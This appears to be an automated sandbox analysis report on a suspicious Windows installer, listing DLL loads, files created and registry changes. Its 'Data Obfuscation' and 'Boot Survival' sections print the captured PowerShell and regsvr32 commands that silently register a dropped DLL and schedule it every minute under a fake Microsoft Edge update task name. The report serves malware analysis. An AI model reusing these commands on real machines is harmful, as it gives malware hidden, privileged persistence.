Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: pdh.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: perfos.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: pdh.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: powrprof.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: umpdc.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: perfos.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\File_is1Jump to behavior
Source: eXIHsSYhOX.exeStatic file information: File size 2495440 > 1048576
Source: eXIHsSYhOX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_6C855C30 CreateTimerQueue,CreateEventW,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateEventW,WaitForSingleObject,SetEvent,DeleteTimerQueue,	7_2_6C855C30
Source: eXIHsSYhOX.exe	Static PE information: section name: .didata
Source: eXIHsSYhOX.tmp.0.dr	Static PE information: section name: .didata
Source: eXIHsSYhOX.tmp.5.dr	Static PE information: section name: .didata
Source: is-L5KBT.tmp.6.dr	Static PE information: section name: .didata
Source: is-SF7GG.tmp.6.dr	Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll"
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_0264411F push es; iretd	7_2_02644137
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_02639EF5 push ecx; ret	7_2_02639F08
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_04F975D3 push eax; retn 0000h	7_2_04F975DA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_04F8A5CA push ecx; ret	7_2_04F8A5DD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_04F947F4 push es; iretd	7_2_04F9480C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_04F8D10D push esp; retf 0040h	7_2_04F8D10E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_027336B8 push ebx; iretd	10_2_027336DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_06F03EAE push dword ptr [eax+eax*2-75h]; iretd	10_2_06F03EB4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_06F0007F push ss; iretd	10_2_06F0009A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_08099B37 push 006ACFEDh; iretd	10_2_08099B62
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_080953E2 push eax; retf	10_2_080953E9
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp	File created: C:\Users\user\AppData\Local\Temp\is-FHHU1.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp	File created: C:\Users\user\AppData\Roaming\is-SF7GG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp	File created: C:\Users\user\AppData\Local\Temp\is-14VP5.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\Desktop\eXIHsSYhOX.exe	File created: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp
Source: C:\Users\user\Desktop\eXIHsSYhOX.exe	File created: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp	File created: C:\Users\user\AppData\Local\is-L5KBT.tmp
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp	File created: C:\Users\user\AppData\Local\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp	File created: C:\Users\user\AppData\Roaming\BurlySparrow.dll (copy)

Boot Survival

Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
